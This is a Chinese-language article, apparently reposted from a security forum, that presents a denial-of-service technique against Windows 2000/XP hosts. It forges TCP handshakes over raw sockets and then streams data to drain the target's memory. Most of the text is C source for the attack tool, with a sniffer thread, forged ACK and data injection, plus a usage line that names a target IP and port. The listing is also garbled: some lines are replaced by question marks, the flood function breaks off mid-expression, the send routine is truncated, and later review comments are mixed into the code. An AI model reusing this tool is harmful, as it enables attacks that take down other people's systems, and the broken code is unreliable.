新型D.o.S(伪造TCP连接进行数据传输的D.o.S)

Author:LionD8
Email:[email protected]
转自安焦
测试平台 VC++6.0 Windows2000 server
目标平台 Windows 2000 , Windows Xp

　　突发奇想：受 NAPTHA 攻击方式的启发，希望能把这种伪造连接的方式扩展到个人 PC 上，并且不受“必须在局域网内”这个条件的限制，于是花了点时间研究了一下，下面就是研究的结果。不废话了，现在拿出来和大家分享一下；还不是很成熟，希望能和大家多多讨论。
　　关于 NAPTHA，原来写过一篇《NAPTHA 在 2000 下的实现》。为什么要利用一个局域网？仅仅是为了更好地隐藏吗？还有一个更重要的因素：避免自己的主机去响应远程主机发出的第二次握手包，防止本机系统发出 RST 包断开掉伪造的连接。另外，原来测试过 NAPTHA 对 Windows 系统并没有多大影响，消耗不了 Windows 多少内存。那么，如果在伪造连接成功之后再传输数据呢？
　　A 为攻击者，C 为被攻击者：
　　A   Syn --------> C
　　A   <-------- Syn,Ack C
　　A   发送数据 --------> C    （伪造的第三次握手 Ack 紧接着就带上数据一起发出，见下面的 ListeningFunc）
　　A   <-------- Ack C
　　A   <-------- Ack C    （此后每收到 C 的一个 Ack 就再发一段数据）

（原文此处有一段内容在转载时丢失，只剩下 checksum() 函数的尾部片段；完整的 checksum() 见后面的源代码。）

    while(size > 1)
????{
????????cksum+=*buffer++;
????????size -=sizeof(USHORT);
????}
????if(size)
????{
????????cksum += *(UCHAR*)buffer;
????}
????cksum = (cksum >> 16) + (cksum & 0xffff);
????cksum += (cksum >>16);
????return (USHORT)(~cksum);
}
如果在 20 字节的 TCP 头部后面带有数据，这样算出来的校验和就和 Windows 2000 系统算出来的不一样。经过分析，差值和数据长度有关。比如 20 字节的 IP 头、20 字节的 TCP 头，再加 2 字节的数据：用上面的 checksum 算出的 TCP 校验和为 0x4523，但系统算出来的是 0x4323。
所以:
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader)+dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)dwSize);
dwSize 为所带数据的长度。否则对方不接收伪造的数据包，也就达不到消耗对方内存的目的。（审阅注：TCP 校验和的伪头部里的 tcpl 字段应当填“TCP 头长度 + 数据长度”；如果只填了头长度，算出的校验和恰好与正确值相差 dwSize，所以这里“事后减去 dwSize”实际上是在补偿伪头部的填写错误，而不是系统算法有什么特别之处。填充伪头部的 SendData 代码在本页被截断，无法完全核实这一点。）

下面是测试的代码。考虑到此程序还是有一定的危害的效果所以没有写成十分方便的测试程序,需要手工sniffer选项字节。然后在命令行下面输入选项字节。
例如（参数依次为：目标 IP、目标端口、TCP 选项字节的十六进制串、SLEEPTIME、可选的 StartPort；对应 main 中对 argv 的解析）：
GzDos.exe 192.168.248.128 1025 020405B401010402 1000 65534
GzDos.exe

源代码:
#include "stdio.h"
#include "winsock2.h"
#include "windows.h"
#include
#include "wchar.h"

#pragma comment(lib, "ws2_32.lib")

/* Receive-all ioctl code for raw sockets; hand-defined here instead of
 * relying on mstcpip.h (which later SDKs provide). */
#define SIO_RCVALL _WSAIOW(IOC_VENDOR, 1)

/* Run-time configuration.  Defaults below are overwritten from argv in main(). */
char   *ATTACKIP   = "192.168.248.128";   /* target address, dotted quad (argv[1]) */
USHORT  ATTACKPORT = 135;                 /* target TCP port (argv[2]) */
USHORT  StartPort  = 1;                   /* first source port (argv[5], optional) */
int     SLEEPTIME  = 2000;                /* argv[4]; presumably the delay between probes in ms */

/* Shared state set up by main()/ConvertOpt() and read by the worker threads. */
UCHAR  *optbuf = NULL;   /* TCP option bytes decoded from argv[3] (filled by ConvertOpt, not shown here) */
USHORT  optlen = 0;      /* length of optbuf in bytes (presumably set by ConvertOpt) */
char   *psend  = NULL;   /* payload buffer sent on every forged data segment */
DWORD   len    = 0;      /* strlen(psend) */

/* IPv4 header (20 bytes, no options) in wire order.  Every field sits at its
 * natural alignment, so sizeof(IPHEADER) == 20 without a packing pragma.
 * Multi-byte fields are compared/filled in network byte order (ListeningFunc
 * compares sourceIP against inet_addr(), which returns network order). */
typedef struct ip_head
{
    unsigned char h_verlen;         /* version (high nibble) + header length in 32-bit words (low nibble) */
    unsigned char tos;              /* type of service */
    unsigned short total_len;       /* total datagram length, header + payload */
    unsigned short ident;           /* identification */
    unsigned short frag_and_flags;  /* flags (3 bits) + fragment offset (13 bits) */
    unsigned char ttl;              /* time to live */
    unsigned char proto;            /* upper-layer protocol; this tool checks for IPPROTO_TCP */
    unsigned short checksum;        /* header checksum */
    unsigned int sourceIP;          /* source address */
    unsigned int destIP;            /* destination address */
}IPHEADER;

/* TCP header (20 bytes, options excluded) in wire order; sizeof == 20 since
 * all fields are naturally aligned.  th_sum is computed over
 * PSDHEADER + this header + data, see checksum() and the article text. */
typedef struct tcp_head
{
    USHORT th_sport;            /* source port */
    USHORT th_dport;            /* destination port */
    unsigned int th_seq;        /* sequence number */
    unsigned int th_ack;        /* acknowledgement number */
    unsigned char th_lenres;    /* data offset in 32-bit words (high nibble) + reserved bits */
    unsigned char th_flag;      /* control bits; ListeningFunc tests 0x12 (SYN|ACK) and 0x10 (ACK) */
    USHORT th_win;              /* window size */
    USHORT th_sum;              /* checksum */
    USHORT th_urp;              /* urgent pointer */
}TCPHEADER;

/* TCP pseudo-header (12 bytes) prepended to the segment only for checksum
 * computation; it is never transmitted.  NOTE(review): per the TCP spec tcpl
 * must hold header + data length.  The article's post-hoc "- dwSize"
 * correction suggests SendData() fills it with the header length only, but
 * SendData is cut off in this listing so that cannot be confirmed here. */
typedef struct tsd_hdr
{
    unsigned long saddr;    /* source address */
    unsigned long daddr;    /* destination address */
    char mbz;               /* must be zero */
    char ptcl;              /* protocol (IPPROTO_TCP) */
    unsigned short tcpl;    /* TCP length (network byte order) */
}PSDHEADER;

/* One attack target: an IPv4 address plus a list of ports.  InitStart() stores
 * a single port in uAttackPort[0] and a 0 in uAttackPort[1], i.e. the array is
 * presumably zero-terminated (room for 10 ports + terminator).  How
 * ThreadSynFlood walks the port list cannot be seen here: its body is garbled
 * in this listing. */
typedef struct attack_obj
{
    DWORD  dwIP;                /* target address, network byte order (from inet_addr) */
    USHORT uAttackPort[11];     /* target ports, network byte order, 0-terminated */
    struct attack_obj* Next;    /* next target; only one entry is ever built here */
}ATOBJ;


ATOBJ *ListAttackObj = NULL;   /* head of the target list, allocated by InitStart() */

////////////////////////////////////////////////////
/* Forward declarations.  Banner(), debugip() and ConvertOpt() are not part of
 * this listing; the rest are defined further down. */
void   Banner();
BOOL   InitStart();
DWORD  GetHostIP();
USHORT checksum(USHORT *buffer, int size);
DWORD WINAPI ThreadSynFlood(LPVOID lp);
DWORD WINAPI ListeningFunc(LPVOID lpvoid);
void   SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP,
                char *pBuf, BOOL Isdata, DWORD dwSize);
void   debugip(DWORD dwip);
void   ConvertOpt(CHAR *pu);
////////////////////////////////////////////////////

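/* Raw sending socket opened by InitStart().  SOCKET is an unsigned integer
 * handle, so the "no socket" value is INVALID_SOCKET, not the pointer NULL. */
SOCKET sock = INVALID_SOCKET;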

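/* Entry point.
 *
 * argv[1] target IP, argv[2] target port, argv[3] TCP option bytes as a hex
 * string, argv[4] SLEEPTIME, argv[5] StartPort (optional).  Starts one
 * sniffer thread (ListeningFunc) per local address, then runs ThreadSynFlood
 * on the main thread.  Returns -1 on any setup failure.
 *
 * Fixes over the original: allocation results are checked, and optbuf is
 * checked for NULL *before* optbuf[3] is modified (the original dereferenced
 * it first and tested it afterwards). */
int main(int argc, char* argv[])
{
    Banner();

    /* Payload for every forged data segment: 799 bytes of '8' (0x38) plus NUL. */
    psend = (char*)malloc(800);
    if (psend == NULL)
    {
        printf("malloc error!\n");
        return -1;
    }
    memset(psend, 0x38, 799);
    psend[799] = 0;
    len = (DWORD)strlen(psend);

    if (argc < 5)
    {
        printf("input error!\n");
        return -1;
    }
    ATTACKIP = strdup(argv[1]);
    ATTACKPORT = (USHORT)atoi(argv[2]);
    CHAR* optbuftemp = (CHAR*)strdup(argv[3]);
    if (ATTACKIP == NULL || optbuftemp == NULL)
    {
        printf("malloc error!\n");
        return -1;
    }

    /* ConvertOpt() (not in this listing) is expected to decode the hex string
     * into the global optbuf; verify that before touching the buffer. */
    ConvertOpt(optbuftemp);
    if (optbuf == NULL)
        return -1;
    optbuf[3] -= 1;   /* lowers the fourth option byte; the article does not say why */

    /* argc == 5: delay only; argc == 6: delay and first source port.
     * Any other count keeps the compiled-in defaults (as the original did). */
    if (argc == 5 || argc == 6)
        SLEEPTIME = atoi(argv[4]);
    if (argc == 6)
        StartPort = (USHORT)atoi(argv[5]);

    if (InitStart() == FALSE)
        return -1;

    /* One sniffer per local address so the SYN/ACK is seen whichever
     * interface the target answers on. */
    char HostName[255] = {0};
    gethostname(HostName, sizeof(HostName));
    struct hostent* lp = gethostbyname(HostName);
    if (lp == NULL)
    {
        printf("gethostbyname error!\n");
        return -1;
    }
    for (int i = 0; lp->h_addr_list[i] != NULL; i++)
    {
        DWORD dwIP = 0;
        memcpy(&dwIP, lp->h_addr_list[i], sizeof(dwIP));
        HANDLE h = CreateThread(NULL, 0, ListeningFunc, (LPVOID)dwIP, 0, NULL);
        if (h == NULL)
        {
            printf("Create ListeningFunc Thread False!\n");
            return -1;
        }
        CloseHandle(h);   /* the handle is never waited on; the thread keeps running */
        Sleep(500);
    }

    ThreadSynFlood(NULL);

    /* Keep the process (and its sniffer threads) alive for roughly 1.5 hours. */
    Sleep(5555555);
    return 0;
}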

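/* Initialises Winsock, builds the single-entry target list from ATTACKIP /
 * ATTACKPORT, and opens the raw IP socket (IP_HDRINCL) used for sending.
 *
 * Returns TRUE on success.  On failure prints a message, releases whatever
 * was acquired so far, and returns FALSE.  Fixes over the original: the
 * calloc() result and the inet_addr() result are checked, and resources are
 * released on the error paths.
 *
 * NOTE(review): this relies on sending hand-built TCP over a raw socket,
 * which the article says works on Windows 2000; later Windows versions
 * restrict that, so expect sendto() failures there. */
BOOL InitStart()
{
    WSADATA WSAData;
    if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
    {
        printf("WSAStartup Error!\n");
        return FALSE;
    }

    /* One target: ATTACKIP with a zero-terminated list holding ATTACKPORT. */
    ListAttackObj = (ATOBJ*)calloc(1, sizeof(ATOBJ));
    if (ListAttackObj == NULL)
    {
        printf("calloc Error!\n");
        WSACleanup();
        return FALSE;
    }
    ListAttackObj->dwIP = inet_addr(ATTACKIP);
    if (ListAttackObj->dwIP == INADDR_NONE)
    {
        printf("Bad target IP!\n");
        WSACleanup();
        return FALSE;
    }
    ListAttackObj->uAttackPort[0] = htons(ATTACKPORT);
    ListAttackObj->uAttackPort[1] = 0;
    ListAttackObj->Next = NULL;

    /* Raw IP socket; IP_HDRINCL means we supply the IP header ourselves. */
    sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (sock == INVALID_SOCKET)
    {
        printf("Socket Setup Error!\n");
        WSACleanup();
        return FALSE;
    }
    BOOL flag = TRUE;
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag)) == SOCKET_ERROR)
    {
        printf("setsockopt IP_HDRINCL error!\n");
        closesocket(sock);
        sock = INVALID_SOCKET;
        WSACleanup();
        return FALSE;
    }

    int nTimeOver = 2000;   /* send timeout in milliseconds */
    if (setsockopt(sock, SOL_SOCKET, SO_SNDTIMEO, (char*)&nTimeOver, sizeof(nTimeOver)) == SOCKET_ERROR)
    {
        printf("setsockopt SO_SNDTIMEO error!\n");
        closesocket(sock);
        sock = INVALID_SOCKET;
        WSACleanup();
        return FALSE;
    }
    return TRUE;
}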

/* Walks the target list built by InitStart() and, per entry, builds and sends
 * the forged SYNs through the raw socket `sock`.
 *
 * NOTE(review): the body of this function is truncated in the page this
 * listing was extracted from -- the marked line jumps from the start of the
 * IP header setup straight to the list advance (`pAtObj = pAtObj->Next`).
 * What exactly is sent, and how StartPort / SLEEPTIME / optbuf are used,
 * cannot be confirmed from here.  The `lp` argument is unused in what is
 * visible. */
DWORD WINAPI ThreadSynFlood(LPVOID lp)
{
    ATOBJ* pAtObj = ListAttackObj;    /* current target */
    SOCKADDR_IN addr_in;
    IPHEADER ipHeader;
    TCPHEADER tcpHeader;
    PSDHEADER psdHeader;
    char szSendBuf[1024]={0};        /* packet assembly buffer */
    int i=0;
    while ( pAtObj != NULL )
    {
        addr_in.sin_family=AF_INET;
        addr_in.sin_addr.S_un.S_addr=pAtObj->dwIP;
        ipHeader.h_verlen=(4Next;    /* <-- truncated in the extracted page; the original text is lost here */
    }
    return 0;
}

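/* Returns the last IPv4 address in this host's own address list, in network
 * byte order, or 0 (INADDR_ANY) if the lookup fails or yields no address.
 *
 * The original indexed h_addr_list[-1] when the list was empty and
 * dereferenced a NULL hostent when gethostbyname() failed; both are handled
 * now.  Not called anywhere in this listing. */
DWORD GetHostIP()
{
    char HostName[255] = {0};
    if (gethostname(HostName, sizeof(HostName)) != 0)
        return 0;

    struct hostent* lp = gethostbyname(HostName);
    if (lp == NULL || lp->h_addr_list == NULL || lp->h_addr_list[0] == NULL)
        return 0;

    /* Find the last non-NULL entry. */
    int last = 0;
    while (lp->h_addr_list[last + 1] != NULL)
        last++;

    DWORD dwIP = 0;
    memcpy(&dwIP, lp->h_addr_list[last], sizeof(dwIP));   /* h_length is 4 for AF_INET */
    return dwIP;
}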
????
/* Internet one's-complement checksum (the IP/TCP/UDP algorithm): sums the
 * buffer as 16-bit words, folds the carries back in, and returns the
 * complement.  `size` is in bytes; a trailing odd byte is added as an
 * 8-bit value.  The result is in the same byte order as the input words,
 * so for a buffer laid out in network order it can be stored directly. */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long acc = 0;
    int remaining = size;
    const USHORT *word = buffer;

    for (; remaining > 1; remaining -= (int)sizeof(USHORT))
        acc += *word++;

    if (remaining)
        acc += *(const UCHAR *)word;

    /* Fold twice: the first fold can itself produce a carry. */
    acc = (acc >> 16) + (acc & 0xffffUL);
    acc += acc >> 16;

    return (USHORT)(~acc);
}

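/* Sniffer thread, one per local address (lpvoid = that address in network
 * byte order).  Captures all IP traffic on the interface via SIO_RCVALL and
 * reacts to TCP segments coming from ATTACKIP:
 *   - SYN|ACK whose ack number matches our forged ISN+1 (0x00198289):
 *     send the forged third-handshake ACK and immediately the first data
 *     segment;
 *   - any pure ACK: send another data segment.
 * Never returns once capturing; returns FALSE if the socket cannot be set up.
 *
 * Fixes over the original: the WSAIoctl() result is checked, datagrams
 * shorter than the headers are skipped instead of being parsed from zeroed
 * memory, and the TCP header is located via the IP header length nibble
 * rather than a fixed 20-byte offset.
 *
 * NOTE(review): the pure-ACK branch does not check ports or sequence numbers,
 * so any ACK from the target address (including ones for unrelated
 * connections) triggers a data segment built from that ACK's fields. */
DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
    SOCKET rawsock;
    SOCKADDR_IN addr_in = {0};
    /* ATTACKIP is fixed once main() has parsed argv; resolve it once here
     * instead of on every captured packet. */
    const DWORD targetIP = inet_addr(ATTACKIP);

    rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if (rawsock == INVALID_SOCKET)
    {
        printf("Sniffer Socket Setup Error!\n");
        return FALSE;
    }

    /* Bind to the local address we were handed.  The port (8288) appears to
     * be an arbitrary value -- bind() needs one, but the raw socket receives
     * every IP datagram regardless. */
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(8288);
    addr_in.sin_addr.S_un.S_addr = (DWORD)lpvoid;
    if (bind(rawsock, (struct sockaddr*)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
    {
        printf("bind false\n");
        exit(0);   /* kept from the original: a listener that cannot bind aborts the whole program */
    }

    /* Switch the socket to receive-all mode. */
    DWORD lpvBuffer = 1;
    DWORD lpcbBytesReturned = 0;
    if (WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0,
                 &lpcbBytesReturned, NULL, NULL) == SOCKET_ERROR)
    {
        printf("WSAIoctl SIO_RCVALL error!\n");
        closesocket(rawsock);
        return FALSE;
    }

    while (TRUE)
    {
        SOCKADDR_IN from = {0};
        int size = sizeof(from);
        char RecvBuf[256] = {0};
        int ret = recvfrom(rawsock, RecvBuf, sizeof(RecvBuf), 0, (struct sockaddr*)&from, &size);
        if (ret == SOCKET_ERROR)
            continue;

        /* Make sure the datagram actually carries an IP header before casting. */
        if (ret < (int)sizeof(IPHEADER))
            continue;
        IPHEADER* lpIPheader = (IPHEADER*)RecvBuf;
        if (lpIPheader->proto != IPPROTO_TCP || lpIPheader->sourceIP != targetIP)
            continue;

        /* IP header length from the IHL nibble (in 32-bit words); the TCP
         * header must also fit in what was received. */
        int iphl = (lpIPheader->h_verlen & 0x0F) * 4;
        if (iphl < (int)sizeof(IPHEADER) || ret < iphl + (int)sizeof(TCPHEADER))
            continue;
        TCPHEADER* lpTCPheader = (TCPHEADER*)(RecvBuf + iphl);

        if (lpTCPheader->th_flag == 0x12)   /* SYN|ACK: the probed port is open */
        {
            /* Only react to the SYN/ACK that acknowledges our forged ISN.  The
             * constant must agree with what ThreadSynFlood puts in the SYN
             * (its body is garbled in this listing, so that cannot be checked). */
            if (lpTCPheader->th_ack == htonl(0x00198289))
            {
                DWORD seq = lpTCPheader->th_ack;
                DWORD ack = htonl(ntohl(lpTCPheader->th_seq) + 1);

                /* Forged third handshake step (no data)... */
                SendData(seq, ack, lpTCPheader->th_dport, lpTCPheader->th_sport,
                         lpIPheader->destIP, lpIPheader->sourceIP, NULL, FALSE, 0);
                /* ...followed straight away by the first data segment. */
                SendData(seq, ack, lpTCPheader->th_dport, lpTCPheader->th_sport,
                         lpIPheader->destIP, lpIPheader->sourceIP, psend, TRUE, len);
            }
        }
        else if (lpTCPheader->th_flag == 0x10)   /* pure ACK from the target: keep sending */
        {
            SendData(lpTCPheader->th_ack, lpTCPheader->th_seq,
                     lpTCPheader->th_dport, lpTCPheader->th_sport,
                     lpIPheader->destIP, lpIPheader->sourceIP, psend, TRUE, len);
        }
    }
    /* not reached */
}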

void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize)
{
??
????SOCKADDR_IN addr_in;
????IPHEADER ipHeader;
????TCPHEADER tcpHeader;
????PSDHEADER psdHeader;

????char szSendBuf[1024]={0};
????addr_in.sin_family=AF_INET;
????addr_in.sin_port = APort;
????addr_in.sin_addr.S_un.S_addr = AIP;
????ipHeader.h_verlen=(4
